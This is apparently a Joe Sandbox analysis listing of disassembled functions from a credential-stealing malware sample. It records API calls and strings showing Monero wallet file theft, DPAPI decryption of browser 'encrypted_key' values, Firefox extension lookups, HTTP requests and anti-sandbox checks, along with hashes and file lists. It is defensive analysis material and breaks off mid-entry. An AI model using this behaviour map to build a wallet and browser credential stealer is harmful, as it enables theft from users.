Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: d541b937f76b8e5ec13451e318158fa200518748a4fd2b4cd8d2b305f3f37946
Instruction ID: 7ef38f57fe106c0d335945aeeabcb221ee642265cdfe6355e27cba38d0cf9347
Opcode Fuzzy Hash: d541b937f76b8e5ec13451e318158fa200518748a4fd2b4cd8d2b305f3f37946
Instruction Fuzzy Hash: DC81EB72910108AACF04FBA4DC96FEE7339AF94300F504528F547B60A1EF746A09DFA6

Function 0092F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6

Part of subcall function 009299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009299EC
Part of subcall function 009299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00929A11
Part of subcall function 009299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00929A31
Part of subcall function 009299C0: ReadFile.KERNEL32(000000FF,?,00000000,0092148F,00000000), ref: 00929A5A
Part of subcall function 009299C0: LocalFree.KERNEL32(0092148F), ref: 00929A90
Part of subcall function 009299C0: CloseHandle.KERNEL32(000000FF), ref: 00929A9A

Part of subcall function 00938E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00938E52

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00941580,00940D92), ref: 0092F54C
lstrlen.KERNEL32(00000000), ref: 0092F56B

Strings

^userContextId=4294967295, xrefs: 0092F59C
moz-extension+++, xrefs: 0092F5AD

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: dbe34cdbfb8a5df42db8b635e127f46ee68e725c62a37634be36f48665687252
Instruction ID: cc4d18b1a4401d2bc4392ad01ab9a09634a3f3941a6720898c3896951b93860a
Opcode Fuzzy Hash: dbe34cdbfb8a5df42db8b635e127f46ee68e725c62a37634be36f48665687252
Instruction Fuzzy Hash: BD51E171D10108AADB04FBB4DC96FED7379AFD4300F408528F956A7191EE346A09CFA6

Function 00929CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 009299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009299EC
Part of subcall function 009299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00929A11
Part of subcall function 009299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00929A31
Part of subcall function 009299C0: ReadFile.KERNEL32(000000FF,?,00000000,0092148F,00000000), ref: 00929A5A
Part of subcall function 009299C0: LocalFree.KERNEL32(0092148F), ref: 00929A90
Part of subcall function 009299C0: CloseHandle.KERNEL32(000000FF), ref: 00929A9A

Part of subcall function 00938E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00938E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00929D39

Part of subcall function 00929AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00924EEE,00000000,00000000), ref: 00929AEF
Part of subcall function 00929AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00924EEE,00000000,?), ref: 00929B01
Part of subcall function 00929AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00924EEE,00000000,00000000), ref: 00929B2A
Part of subcall function 00929AC0: LocalFree.KERNEL32(?,?,?,?,00924EEE,00000000,?), ref: 00929B3F

Part of subcall function 00929B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00929B84
Part of subcall function 00929B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00929BA3
Part of subcall function 00929B60: LocalFree.KERNEL32(?), ref: 00929BD3

Strings

"encrypted_key":", xrefs: 00929D30
DPAPI, xrefs: 00929D89
, xrefs: 00929DC1

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: 59384b655c8a6c5ba8236bca7284e0e8e62f20f95f9285d037585fb38cd0ffe7
Instruction ID: a711eb5e2618d4b59b692aa83e73c279f7e3f90933ccd6c96c0e2a99351ead4c
Opcode Fuzzy Hash: 59384b655c8a6c5ba8236bca7284e0e8e62f20f95f9285d037585fb38cd0ffe7
Instruction Fuzzy Hash: 40313275D10219ABCF14DBE4EC85FEF77B8AF88304F144518F905A7285E7749A44CBA1

Function 00936AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006F8FB8,?,0094110C,?,00000000,?,00941110,?,00000000,00940AEF), ref: 00936ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00936AE8
CloseHandle.KERNEL32(00000000), ref: 00936AF9
Sleep.KERNEL32(00001770), ref: 00936B04
CloseHandle.KERNEL32(?,00000000,?,006F8FB8,?,0094110C,?,00000000,?,00941110,?,00000000,00940AEF), ref: 00936B1A
ExitProcess.KERNEL32 ref: 00936B22

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 6ad6ba146417ef1a82b4017f0b72f668193b5d26f2160cd91efb88704dc55b98
Instruction ID: 3e4d4b5a08a8701ed34ffe7308417933103ebcf4a75ff3e387d4aad05d562b63
Opcode Fuzzy Hash: 6ad6ba146417ef1a82b4017f0b72f668193b5d26f2160cd91efb88704dc55b98
Instruction Fuzzy Hash: 35F03A30944209BAEB00ABA0DC16BBDBA74EB44701F108914F503E61C1CBF45940DE56

Function 009247B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00924839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00924849

Strings

<, xrefs: 009247C9

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: 942984c137cb2d3af535bc011d1b19b3d7aa04afd6cfecb1bd666340191aeb6f
Instruction ID: 174b2d15bf57753993761f62fcd6d525d92f102148e949b7f118c9e34334a34b
Opcode Fuzzy Hash: 942984c137cb2d3af535bc011d1b19b3d7aa04afd6cfecb1bd666340191aeb6f
Instruction Fuzzy Hash: F22129B1D00208ABDF14DFA5EC46BDD7B78EB44320F108225E965A72D0DB706A0ACF91

Function 009351F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6

Part of subcall function 00926280: InternetOpenA.WININET(00940DFE,00000001,00000000,00000000,00000000), ref: 009262E1
Part of subcall function 00926280: StrCmpCA.SHLWAPI(?,006FE9D8), ref: 00926303
Part of subcall function 00926280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00926335
Part of subcall function 00926280: HttpOpenRequestA.WININET(00000000,GET,?,006FE400,00000000,00000000,00400100,00000000), ref: 00926385
Part of subcall function 00926280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009263BF
Part of subcall function 00926280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009263D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00935228

Strings

ERROR, xrefs: 00935273
ERROR, xrefs: 0093521A

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 6444a29d127700d06ee15015929f3a4b9c1018b2b2ae58fdfcad15332cfe58e7
Instruction ID: b6949e24f61cb7ddd7e12444cef3b64a59d3c97198afd726b15b8f25461b8c54
Opcode Fuzzy Hash: 6444a29d127700d06ee15015929f3a4b9c1018b2b2ae58fdfcad15332cfe58e7
Instruction Fuzzy Hash: C7110C31910148ABCB14FF64DD92FED7378AF90300F804558F95A5B592EF34AB06CE92

Function 00921220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0092123E
ExitProcess.KERNEL32 ref: 00921294

Strings

@, xrefs: 00921233

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 803317263-2766056989
Opcode ID: 2d48f73a616f3938f3ef741aaae2483ff9c7d969e1c900d047eea4ea5b767058
Instruction ID: fb94158911af60d249a33222a9458c5277eab56b3bdf02719890630fcd7e796a
Opcode Fuzzy Hash: 2d48f73a616f3938f3ef741aaae2483ff9c7d969e1c900d047eea4ea5b767058
Instruction Fuzzy Hash: 65016DB0D44308FBEF10DBE0EC49BAEBB78AB54701F208048F705B62C4DBB855518B99

Function 00934F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00938DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00938E0B

